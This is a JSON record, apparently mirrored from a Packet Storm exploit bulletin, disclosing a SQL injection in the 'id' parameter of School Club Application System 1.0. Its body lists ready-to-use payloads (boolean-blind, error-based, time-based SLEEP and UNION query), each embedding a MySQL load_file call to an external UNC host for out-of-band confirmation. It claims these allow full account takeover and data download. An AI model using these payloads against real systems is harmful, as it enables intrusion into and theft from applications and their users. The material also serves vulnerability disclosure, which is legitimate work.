{"id": "PACKETSTORM:166614", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "School Club Application System 1.0 SQL Injection", "description": "", "published": "2022-04-07T00:00:00", "modified": "2022-04-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166614/School-Club-Application-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T16:42:58", "viewCount": 86, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166614/scas10-sql.txt", "sourceData": "`## Title: School Club Application System v1.0 SQLi \n## Author: nu11secur1ty \n## Date: 04.07.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html \n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application \n \n## Description: \nThe `id` parameter appears to be vulnerable to three types of SQL \ninjection attacks. \nThe payload '+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+' \nwas submitted in the id parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nThe attacker can take administrator account control and also of all \naccounts on this system, also the malicious user can download all \ninformation about this system. \n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n \n--- \nParameter: id (GET) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause (NOT) \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nOR NOT 2914=2914-- erOW \n \nType: error-based \nTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nOR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT \n(ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nAND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 8 columns \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nUNION ALL SELECT \nCONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- \n- \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application) \n \n## Proof and Exploit: \n[href](https://streamable.com/lpwxr4) \n \n \n`\n"}